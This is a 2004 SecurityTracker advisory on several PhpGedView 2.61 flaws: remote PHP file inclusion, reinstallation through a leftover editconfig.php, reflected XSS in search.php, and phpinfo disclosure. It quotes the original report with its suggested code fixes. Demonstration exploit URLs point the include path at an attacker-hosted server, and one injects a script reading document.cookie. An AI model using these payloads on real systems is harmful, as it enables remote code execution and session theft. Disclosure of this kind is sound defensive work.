PhpGedView Input Validation Flaws Let Remote Users Execute Arbitrary Commands
|
|
SecurityTracker Alert ID: 1008632
|
|
SecurityTracker URL: http://securitytracker.com/id?1008632
|
|
CVE Reference: CVE-2004-0030
, CVE-2004-0031
, CVE-2004-0032
, CVE-2004-0033
(Links to External Site)
|
Updated: Jul 6 2008
|
Original Entry Date: Jan 7 2004
|
Impact: Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
|
Exploit Included: Yes
|
Advisory: Vietnamese Security Group
|
Version(s): 2.61
|
Description: Several vulnerabilities were reported in PhpGedView. A remote user can execute arbitrary PHP code and operating system commands on the target system.
Windak of Vietnamese Security Group reported that the 'functions.php', 'authentication_index.php', and 'config_gedcom.php' files
include other files relative to the $PGV_BASE_DIRECTORY variable [CVE-2004-0030]. A remote user can supply a specially crafted
URL to cause a PHP file at a remote location to be included and executed by the target system.
Some demonstration exploit URLs
are provided:
http://[target]/phpgedview_folder/authentication_index.php?PGV_BASE_DIRECTORY=http://[attacker]/
http://[target]/phpgedview_folder/functions.php?PGV_BA
SE_DIRECTORY=http://[attacker]/
http://[target]/phpgedview_folder/config_gedcom.php?PGV_BASE_DIRECTORY=http://[attacker]/
It
is also reported that the 'editconfig.php' file can be invoked by a remote user to re-install the software and change the administrator
password [CVE-2004-0031]:
http://[target]/phpgedview_folder/editconfig.php
It is also reported that the 'search.php' file
does not filter HTML code from user-supplied input in the 'firstname' variable [CVE-2004-0032]. A remote user can create a specially
crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser.
The code will originate from the site running the PhpGedView software and will run in the security context of that site. As a result,
the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site,
access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
A
demonstration exploit URL is provided:
http://localhost/phpgedview/search.php?action=soundex&firstname="><script>alert(document.cookie)</script>
It is also reported that a remote user can determine information about the PHP configuration on the target system by using the following
type of URL [CVE-2004-0033]:
http://[target]/phpgedview_folder/admin.php?action=phpinfo
|
Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system. The code and commands will run
with the privileges of the target web service.
A remote user can access the target user's cookies (including authentication cookies),
if any, associated with the site running the PhpGedView software, access data recently submitted by the target user via web form
to the site, or take actions on the site acting as the target user.
A remote user can reconfigure the application, including
changing the administrative password.
A remote user can determine information about the PHP configuration.
|
Solution: No solution was available at the time of this entry.
An unofficial fix for each flaw is described in the Source Message.
|
Vendor URL: phpgedview.sourceforge.net/ (Links to External Site)
|
Cause: Access control error, Input validation error, State error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: Vietnamese Security Group <security@security.com.vn>
|
Message History:
None.
|
Source Message Contents
|
Date: 6 Jan 2004 06:19:55 -0000
From: Vietnamese Security Group <security@security.com.vn>
Subject: Vuln in PHPGEDVIEW 2.61 Multi-Problem
|
Tittle : Vuln in PHPGEDVIEW 2.61
Lang : PHP
Author : Windak
Website: www.security.com.vn
Version : PHPGEDVIEW 2.61 Multi-Problem
Introduction :
PHPGEDVIEW is program read projects GEDCOM file ( default html ) .
Bug :
1) Php code injection :
Rick : Hight
- Vuln in any files : functions.php, authentication_index.php ,config_gedcom.php
In authentication_index.php file : at line 33 :
require $PGV_BASE_DIRECTORY."authenticate.php";
In functions.php file : at line 35 :
require($PGV_BASE_DIRECTORY."functions_print.php");
In config_gedcom.php file : at line 115 :
if (file_exists($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php")) require($PGV_BASE_DIRECTORY.$T
HEME_DIR."theme.php");
else {
$THEME_DIR = $PGV_BASE_DIRECTORY."themes/standard/";
require($THEME_DIR."theme.php");
Exploit :
http://target/phpgedview_folder/authentication_index.php?PGV_BASE_DIRECTORY=http://attacker/
http://target/phpgedview_folder/functions.php?PGV_BASE_DIRECTORY=http://attacker/
http://target/phpgedview_folder/config_gedcom.php?PGV_BASE_DIRECTORY=http://attacker/
Script named authenticate.php put in http://attacker/ ( or functions_print.php , theme.php put in fo
lder /themes/standard /
FIX : add firt line files have been vuln : Require (config.php);
2) Config again :
rick: Medium
If you not deleted editconfig.php file after install then attacker can reinstall and change password
administrator .
Link : http://target/phpgedview_folder/editconfig.php
fix : Delete editconfig.php file
3) XSS :
Rick : medium
Exploit :
http://localhost/phpgedview/search.php?action=soundex&firstname="><script>a
lert(document.cookie)</script>
fix :
Find :
<input type="text" name="firstname" value="<?php if ($action=="so
undex") print $firstname; size="20" ?>" /></td></tr>
<tr><td><?php print $pgv_lang["lastname_search"]?></td><td>
<input type="text" name="lastname" value="<?php if ($action=="sou
ndex") print $lastname; size="20" ?>" /></td></tr>
<tr><td><?php print $pgv_lang["search_place"]?></td><td>
<input type="text" name="place" value="<?php if ($action=="sounde
x") print $place; size="20" ?>" /></td></tr>
<tr><td><?php print $pgv_lang["search_year"]?></td><td>
<input type="text" name="year" value="<?php if ($action=="soundex"
) print $year; size="20" ?>" /></td></tr>
replace with :
<input type="text" name="firstname" value="" /></td></tr>
<tr><td><?php print $pgv_lang["lastname_search"]?></td><td>
<input type="text" name="lastname" value="" /></td></tr>
<tr><td><?php print $pgv_lang["search_place"]?></td><td>
<input type="text" name="place" value="" /></td></tr>
<tr><td><?php print $pgv_lang["search_year"]?></td><td>
<input type="text" name="year" value="" /></td></tr>
4) Show info server :
rick : low
I can show info server
Link: http://target/phpgedview_folder/admin.php?action=phpinfo
fix :
Find :
if (!isset($action)) $action="";
if ($action=="phpinfo") {
phpinfo();
exit;
}
if (!userIsAdmin(getUserName())) {
header("Location: login.php?url=admin.php");
exit;
}
replace with :
if (!userIsAdmin(getUserName())) {
header("Location: login.php?url=admin.php");
exit;
}
if (!isset($action)) $action="";
if ($action=="phpinfo") {
phpinfo();
exit;
}
=======================================================================
Windak - Vietnamese Security Group
www.security.com.vn
|
|
